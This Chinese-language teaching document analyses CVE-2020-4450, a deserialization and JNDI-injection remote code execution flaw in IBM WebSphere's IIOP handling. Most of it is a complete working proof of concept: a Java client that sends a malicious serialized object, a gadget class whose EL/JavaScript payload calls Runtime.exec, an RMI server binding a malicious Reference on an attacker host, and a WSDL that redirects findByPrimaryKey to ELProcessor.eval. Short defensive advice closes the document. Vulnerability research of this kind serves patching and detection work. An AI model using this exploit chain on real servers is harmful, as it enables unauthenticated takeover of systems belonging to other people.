WebSphere 远程代码执行漏洞分析（CVE-2020-4450）教学文档<\/h1>

漏洞概述<\/h2>
CVE-2020-4450是IBM WebSphere Application Server (WAS)中的一个高危远程代码执行漏洞，于2020年6月8日由IBM官方发布通告。该漏洞通过IIOP协议上的反序列化恶意对象实现攻击，未经身份认证的攻击者可以远程攻击WAS服务器，在目标服务端执行任意代码，获取系统权限。<\/p>

漏洞原理分析<\/h2>

漏洞触发流程<\/h3>

IIOP协议处理<\/strong>：WAS对于IIOP的数据由com.ibm.ws.Transaction.JTS.TxServerInterceptor#receive_request<\/code>方法处理<\/li>
反序列化入口<\/strong>：当ServiceContext<\/code>对象不为空时，调用com.ibm.ws.Transaction.JTS.TxInterceptorHelper#demarshalContext<\/code>进入反序列化执行流<\/li>

反射调用<\/strong>：最终通过com.ibm.rmi.io.IIOPInputStream#invokeObjectReader<\/code>反射调用readObject<\/code>方法进行反序列化<\/li> <\/ol> 关键调用栈<\/h3> readObject:516, WSIFPort_EJB (org.apache.wsif.providers.ejb) invoke0:-1, NativeMethodAccessorImpl (sun.reflect) invoke:90, NativeMethodAccessorImpl (sun.reflect) invoke:55, DelegatingMethodAccessorImpl (sun.reflect) invoke:508, Method (java.lang.reflect) invokeObjectReader:2483, IIOPInputStream (com.ibm.rmi.io) inputObjectUsingClassDesc:2010, IIOPInputStream (com.ibm.rmi.io) continueSimpleReadObject:749, IIOPInputStream (com.ibm.rmi.io) simpleReadObjectLoop:720, IIOPInputStream (com.ibm.rmi.io) simpleReadObject:669, IIOPInputStream (com.ibm.rmi.io) readValue:193, ValueHandlerImpl (com.ibm.rmi.io) read_value:787, CDRReader (com.ibm.rmi.iiop) read_value:847, EncoderInputStream (com.ibm.rmi.iiop) unmarshalIn:273, TCUtility (com.ibm.rmi.corba) read_value:664, AnyImpl (com.ibm.rmi.corba) read_any:467, CDRReader (com.ibm.rmi.iiop) read_any:797, EncoderInputStream (com.ibm.rmi.iiop) demarshalContext:171, TxInterceptorHelper (com.ibm.ws.Transaction.JTS) receive_request:180, TxServerInterceptor (com.ibm.ws.Transaction.JTS) dispatch:508, ServerDelegate (com.ibm.CORBA.iiop) <\/code><\/pre> 核心利用点<\/h3> 利用org.apache.wsif.providers.ejb.WSIFPort_EJB.class<\/code>的readObject<\/code>方法中的JNDI注入逻辑：<\/p> lookup:150, RegistryContext (com.sun.jndi.rmi.registry) lookup:217, GenericURLContext (com.sun.jndi.toolkit.url) lookup:161, DelegateContext (org.apache.aries.jndi) lookup:428, InitialContext (javax.naming) getEJBObject:166, EntityHandle (com.ibm.ejs.container) readObject:516, WSIFPort_EJB (org.apache.wsif.providers.ejb) <\/code><\/pre> 关键利用技术<\/h3> JNDI注入<\/strong>：修改environment<\/code>变量中的java.naming.factory.object<\/code>属性值为org.apache.wsif.naming.WSIFServiceObjectFactory<\/code><\/li> WSIF利用<\/strong>：通过自定义wsdl文件将接口方法映射到其他类的危险方法<\/li> EJB规范利用<\/strong>：通过自定义wsdl文件映射EJBHome的findByPrimaryKey<\/code>方法到javax.el.ELProcessor<\/code>的eval<\/code>方法<\/li> <\/ol> 漏洞复现<\/h2> 环境准备<\/h3> 受影响的WebSphere Application Server版本<\/li> 攻击机（运行POC代码）<\/li> RMI服务器（用于托管恶意Reference对象）<\/li> HTTP服务器（用于托管恶意wsdl文件）<\/li> <\/ol> POC代码分析<\/h3> 主测试类<\/h4> public<\/span> class<\/span> Test<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Properties env =<\/span> new<\/span> Properties();<\/span> <\/span><\/span> env.<\/span>put<\/span>(<\/span>Context.<\/span>PROVIDER_URL<\/span>,<\/span> "iiop:\/\/169.254.0.117:2809"<\/span>);<\/span> <\/span><\/span> env.<\/span>put<\/span>(<\/span>Context.<\/span>INITIAL_CONTEXT_FACTORY<\/span>,<\/span> "com.ibm.websphere.naming.WsnInitialContextFactory"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> InitialContext context =<\/span> new<\/span> InitialContext(<\/span>env);<\/span> <\/span><\/span> context.<\/span>list<\/span>(<\/span>""<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 通过反射获取并修改内部上下文对象 <\/span><\/span><\/span><\/span> Field f_defaultInitCtx =<\/span> context.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"defaultInitCtx"<\/span>);<\/span> <\/span><\/span> f_defaultInitCtx.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> WsnInitCtx defaultInitCtx =<\/span> (<\/span>WsnInitCtx)<\/span> f_defaultInitCtx.<\/span>get<\/span>(<\/span>context);<\/span> <\/span><\/span> <\/span><\/span> Field f_context =<\/span> defaultInitCtx.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_context"<\/span>);<\/span> <\/span><\/span> f_context.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> CNContextImpl _context =<\/span> (<\/span>CNContextImpl)<\/span> f_context.<\/span>get<\/span>(<\/span>defaultInitCtx);<\/span> <\/span><\/span> <\/span><\/span> Field f_corbaNC =<\/span> _context.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_corbaNC"<\/span>);<\/span> <\/span><\/span> f_corbaNC.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> _NamingContextStub _corbaNC =<\/span> (<\/span>_NamingContextStub)<\/span> f_corbaNC.<\/span>get<\/span>(<\/span>_context);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取并修改CORBA相关对象 <\/span><\/span><\/span><\/span> Field f__delegate =<\/span> ObjectImpl.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"__delegate"<\/span>);<\/span> <\/span><\/span> f__delegate.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> ClientDelegate clientDelegate =<\/span> (<\/span>ClientDelegate)<\/span> f__delegate.<\/span>get<\/span>(<\/span>_corbaNC);<\/span> <\/span><\/span> <\/span><\/span> Field f_ior =<\/span> clientDelegate.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"ior"<\/span>);<\/span> <\/span><\/span> f_ior.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> IOR ior =<\/span> (<\/span>IOR)<\/span> f_ior.<\/span>get<\/span>(<\/span>clientDelegate);<\/span> <\/span><\/span> <\/span><\/span> Field f_orb =<\/span> clientDelegate.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"orb"<\/span>);<\/span> <\/span><\/span> f_orb.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> ORB orb =<\/span> (<\/span>ORB)<\/span> f_orb.<\/span>get<\/span>(<\/span>clientDelegate);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 设置恶意上下文 <\/span><\/span><\/span><\/span> GIOPImpl giop =<\/span> (<\/span>GIOPImpl)<\/span> orb.<\/span>getServerGIOP<\/span>();<\/span> <\/span><\/span> Method getConnection =<\/span> giop.<\/span>getClass<\/span>().<\/span>getDeclaredMethod<\/span>(<\/span>"getConnection"<\/span>,<\/span> com.<\/span>ibm<\/span>.<\/span>CORBA<\/span>.<\/span>iiop<\/span>.<\/span>IOR<\/span>.<\/span>class<\/span>,<\/span> com.<\/span>ibm<\/span>.<\/span>rmi<\/span>.<\/span>Profile<\/span>.<\/span>class<\/span>,<\/span> com.<\/span>ibm<\/span>.<\/span>rmi<\/span>.<\/span>corba<\/span>.<\/span>ClientDelegate<\/span>.<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>);<\/span> <\/span><\/span> getConnection.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Connection connection =<\/span> (<\/span>Connection)<\/span> getConnection.<\/span>invoke<\/span>(<\/span>giop,<\/span> ior,<\/span> ior.<\/span>getProfile<\/span>(),<\/span> clientDelegate,<\/span> "beijixiong404"<\/span>);<\/span> <\/span><\/span> Method setConnectionContexts =<\/span> connection.<\/span>getClass<\/span>().<\/span>getDeclaredMethod<\/span>(<\/span>"setConnectionContexts"<\/span>,<\/span> ArrayList.<\/span>class<\/span>);<\/span> <\/span><\/span> setConnectionContexts.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span> ArrayList v4 =<\/span> new<\/span> ArrayList();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建恶意WSIFPort_EJB对象 <\/span><\/span><\/span><\/span> WSIFPort_EJB wsifPort_ejb =<\/span> new<\/span> WSIFPort_EJB(<\/span>null<\/span>,<\/span>null<\/span>,<\/span>null<\/span>);<\/span> <\/span><\/span> <\/span><\/span> Field fieldEjbObject =<\/span> wsifPort_ejb.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"fieldEjbObject"<\/span>);<\/span> <\/span><\/span> fieldEjbObject.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> fieldEjbObject.<\/span>set<\/span>(<\/span>wsifPort_ejb,<\/span>new<\/span> EJSWrapperS());<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造恶意序列化数据 <\/span><\/span><\/span><\/span> CDROutputStream outputStream =<\/span> ORB.<\/span>createCDROutputStream<\/span>();<\/span> <\/span><\/span> outputStream.<\/span>putEndian<\/span>();<\/span> <\/span><\/span> Any any =<\/span> orb.<\/span>create_any<\/span>();<\/span> <\/span><\/span> any.<\/span>insert_Value<\/span>(<\/span>wsifPort_ejb);<\/span> <\/span><\/span> PropagationContext propagationContext =<\/span> new<\/span> PropagationContext(<\/span>0<\/span>,<\/span> <\/span><\/span> new<\/span> TransIdentity(<\/span>null<\/span>,<\/span>null<\/span>,<\/span> new<\/span> otid_t(<\/span>0<\/span>,<\/span>0<\/span>,<\/span>new<\/span> byte<\/span>[<\/span>0<\/span>])),<\/span> <\/span><\/span> new<\/span> TransIdentity[<\/span>0<\/span>],<\/span> <\/span><\/span> any);<\/span> <\/span><\/span> PropagationContextHelper.<\/span>write<\/span>(<\/span>outputStream,<\/span>propagationContext);<\/span> <\/span><\/span> byte<\/span>[]<\/span> result =<\/span> outputStream.<\/span>toByteArray<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 设置恶意ServiceContext <\/span><\/span><\/span><\/span> ServiceContext serviceContext =<\/span> new<\/span> ServiceContext(<\/span>0<\/span>,<\/span> result);<\/span> <\/span><\/span> v4.<\/span>add<\/span>(<\/span>serviceContext);<\/span> <\/span><\/span> setConnectionContexts.<\/span>invoke<\/span>(<\/span>connection,<\/span> v4);<\/span> <\/span><\/span> context.<\/span>list<\/span>(<\/span>""<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>EJSWrapperS类<\/h4> class<\/span> EJSWrapperS<\/span> extends<\/span> EJSWrapper {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> Handle getHandle<\/span>()<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> Handle var2 =<\/span> null<\/span>;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> SessionHome sessionHome =<\/span> new<\/span> SessionHome();<\/span> <\/span><\/span> J2EEName j2EEName =<\/span> new<\/span> J2EENameImpl(<\/span>"aa"<\/span>,<\/span> "aa"<\/span>,<\/span> "aa"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 通过反射设置EJBHome属性 <\/span><\/span><\/span><\/span> Field j2eeName =<\/span> EJSHome.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"j2eeName"<\/span>);<\/span> <\/span><\/span> j2eeName.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> j2eeName.<\/span>set<\/span>(<\/span>sessionHome,<\/span> j2EEName);<\/span> <\/span><\/span> <\/span><\/span> Field jndiName =<\/span> sessionHome.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"jndiName"<\/span>);<\/span> <\/span><\/span> jndiName.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> jndiName.<\/span>set<\/span>(<\/span>sessionHome,<\/span> "rmi:\/\/169.254.0.117:1099\/poc"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造恶意代码执行payload <\/span><\/span><\/span><\/span> Serializable key =<\/span> "\"a\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('calc')\")"<\/span>;<\/span> <\/span><\/span> <\/span><\/span> BeanId beanId =<\/span> new<\/span> BeanId(<\/span>sessionHome,<\/span> key,<\/span> true<\/span>);<\/span> <\/span><\/span> BeanMetaData beanMetaData =<\/span> new<\/span> BeanMetaData(<\/span>1<\/span>);<\/span> <\/span><\/span> beanMetaData.<\/span>homeInterfaceClass<\/span> =<\/span> com.<\/span>ibm<\/span>.<\/span>ws<\/span>.<\/span>batch<\/span>.<\/span>CounterHome<\/span>.<\/span>class<\/span>;<\/span> <\/span><\/span> <\/span><\/span> \/\/ 设置恶意ObjectFactory <\/span><\/span><\/span><\/span> Properties initProperties =<\/span> new<\/span> Properties();<\/span> <\/span><\/span> initProperties.<\/span>setProperty<\/span>(<\/span>"java.naming.factory.object"<\/span>,<\/span> "org.apache.wsif.naming.WSIFServiceObjectFactory"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> Constructor c =<\/span> EntityHandle.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>(<\/span>BeanId.<\/span>class<\/span>,<\/span> BeanMetaData.<\/span>class<\/span>,<\/span> Properties.<\/span>class<\/span>);<\/span> <\/span><\/span> c.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> var2 =<\/span> (<\/span>Handle)<\/span> c.<\/span>newInstance<\/span>(<\/span>beanId,<\/span> beanMetaData,<\/span> initProperties);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> var2;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>RMI服务器<\/h4> public<\/span> class<\/span> RMIServer<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造恶意Reference对象 <\/span><\/span><\/span><\/span> Reference ref =<\/span> new<\/span> Reference(<\/span>WSIFServiceStubRef.<\/span>class<\/span>.<\/span>getName<\/span>(),<\/span> (<\/span>String)<\/span> null<\/span>,<\/span> (<\/span>String)<\/span> null<\/span>);<\/span> <\/span><\/span> ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"wsdlLoc"<\/span>,<\/span> "http:\/\/169.254.0.117:80\/poc.wsdl"<\/span>));<\/span> <\/span><\/span> ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"serviceNS"<\/span>,<\/span> null<\/span>));<\/span> <\/span><\/span> ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"serviceName"<\/span>,<\/span> null<\/span>));<\/span> <\/span><\/span> ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"portTypeNS"<\/span>,<\/span> "http:\/\/wsifservice.addressbook\/"<\/span>));<\/span> <\/span><\/span> ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"portTypeName"<\/span>,<\/span> "Gadget"<\/span>));<\/span> <\/span><\/span> ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"preferredPort"<\/span>,<\/span> "JavaPort"<\/span>));<\/span> <\/span><\/span> ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"className"<\/span>,<\/span> "com.ibm.ws.batch.CounterHome"<\/span>));<\/span> <\/span><\/span> <\/span><\/span> ReferenceWrapper referenceWrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>ref);<\/span> <\/span><\/span> registry.<\/span>bind<\/span>(<\/span>"poc"<\/span>,<\/span> referenceWrapper);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>恶意WSDL文件<\/h4> <?xml version="1.0" ?><\/span> <\/span><\/span> <\/span><\/span><definitions<\/span> targetNamespace=<\/span>"http:\/\/wsifservice.addressbook\/"<\/span> <\/span><\/span> xmlns:tns=<\/span>"http:\/\/wsifservice.addressbook\/"<\/span> <\/span><\/span> xmlns:xsd=<\/span>"http:\/\/www.w3.org\/1999\/XMLSchema"<\/span> <\/span><\/span> xmlns:format=<\/span>"http:\/\/schemas.xmlsoap.org\/wsdl\/formatbinding\/"<\/span> <\/span><\/span> xmlns:java=<\/span>"http:\/\/schemas.xmlsoap.org\/wsdl\/java\/"<\/span> <\/span><\/span> xmlns=<\/span>"http:\/\/schemas.xmlsoap.org\/wsdl\/"<\/span>><\/span> <\/span><\/span> <\/span><\/span> <\/span> <\/span><\/span> <message<\/span> name=<\/span>"findByPrimaryKeyRequest"<\/span>><\/span> <\/span><\/span> <part<\/span> name=<\/span>"el"<\/span> type=<\/span>"xsd:string"<\/span>\/><\/span> <\/span><\/span> <\/message><\/span> <\/span><\/span> <\/span><\/span> <message<\/span> name=<\/span>"findByPrimaryKeyResponse"<\/span>><\/span> <\/span><\/span> <part<\/span> name=<\/span>"counterObject"<\/span> type=<\/span>"xsd:object"<\/span>\/><\/span> <\/span><\/span> <\/message><\/span> <\/span><\/span> <\/span><\/span> <\/span> <\/span><\/span> <portType<\/span> name=<\/span>"Gadget"<\/span>><\/span> <\/span><\/span> <operation<\/span> name=<\/span>"findByPrimaryKey"<\/span>><\/span> <\/span><\/span> <input<\/span> message=<\/span>"tns:findByPrimaryKeyRequest"<\/span>\/><\/span> <\/span><\/span> <output<\/span> message=<\/span>"tns:findByPrimaryKeyResponse"<\/span>\/><\/span> <\/span><\/span> <\/operation><\/span> <\/span><\/span> <\/portType><\/span> <\/span><\/span> <\/span><\/span> <\/span> <\/span><\/span> <binding<\/span> name=<\/span>"JavaBinding"<\/span> type=<\/span>"tns:Gadget"<\/span>><\/span> <\/span><\/span> <java:binding\/><\/span> <\/span><\/span> <format:typeMapping<\/span> encoding=<\/span>"Java"<\/span> style=<\/span>"Java"<\/span>><\/span> <\/span><\/span> <format:typeMap<\/span> typeName=<\/span>"xsd:string"<\/span> formatType=<\/span>"java.lang.String"<\/span>\/><\/span> <\/span><\/span> <format:typeMap<\/span> typeName=<\/span>"xsd:object"<\/span> formatType=<\/span>"java.lang.Object"<\/span>\/><\/span> <\/span><\/span> <\/format:typeMapping><\/span> <\/span><\/span> <operation<\/span> name=<\/span>"findByPrimaryKey"<\/span>><\/span> <\/span><\/span> <java:operation<\/span> <\/span><\/span> methodName=<\/span>"eval"<\/span> <\/span><\/span> parameterOrder=<\/span>"el"<\/span> <\/span><\/span> methodType=<\/span>"instance"<\/span> <\/span><\/span> returnPart=<\/span>"counterObject"<\/span> <\/span><\/span> \/><\/span> <\/span><\/span> <\/operation><\/span> <\/span><\/span> <\/binding><\/span> <\/span><\/span> <\/span><\/span> <\/span> <\/span><\/span> <service<\/span> name=<\/span>"GadgetService"<\/span>><\/span> <\/span><\/span> <port<\/span> name=<\/span>"JavaPort"<\/span> binding=<\/span>"tns:JavaBinding"<\/span>><\/span> <\/span><\/span> <java:address<\/span> className=<\/span>"javax.el.ELProcessor"<\/span>\/><\/span> <\/span><\/span> <\/port><\/span> <\/span><\/span> <\/service><\/span> <\/span><\/span><\/definitions><\/span> <\/span><\/span><\/code><\/pre>漏洞利用流程<\/h3> 启动RMI服务器，绑定恶意Reference对象<\/li> 启动HTTP服务器，托管恶意WSDL文件<\/li> 运行POC代码，触发漏洞<\/li> WAS服务器通过IIOP协议接收恶意序列化数据<\/li> 反序列化过程中触发JNDI查找<\/li> 从RMI服务器获取恶意Reference对象<\/li> 通过WSIFServiceObjectFactory加载恶意WSDL文件<\/li> 将EJBHome的findByPrimaryKey方法映射到ELProcessor的eval方法<\/li> 执行任意代码<\/li> <\/ol> 防御措施<\/h2> 及时更新<\/strong>：应用IBM官方发布的安全补丁<\/li> 网络防护<\/strong>：限制IIOP端口的网络访问<\/li> 使用防火墙规则限制不必要的IIOP通信<\/li> <\/ul> <\/li> 安全配置<\/strong>：禁用不必要的IIOP服务<\/li> 配置WebSphere安全域，限制远程访问<\/li> <\/ul> <\/li> 监控检测<\/strong>：监控IIOP端口的异常流量<\/li> 部署WAF规则检测恶意IIOP请求<\/li> <\/ul> <\/li> <\/ol> 技术要点总结<\/h2> IIOP协议<\/strong>：CORBA的通信协议，WebSphere使用它进行分布式通信<\/li> 反序列化漏洞<\/strong>：通过构造恶意序列化对象触发<\/li> JNDI注入<\/strong>：修改ObjectFactory实现类为恶意类<\/li> WSIF利用<\/strong>：通过WSDL文件重定向方法调用<\/li> EJB规范<\/strong>：利用findByPrimaryKey方法的调用机制<\/li> <\/ol> 参考资源<\/h2> ZDI漏洞分析<\/a><\/li> 360漏洞报告<\/a><\/li> Seebug Paper<\/a><\/li> 安全内参<\/a><\/li> <\/ol>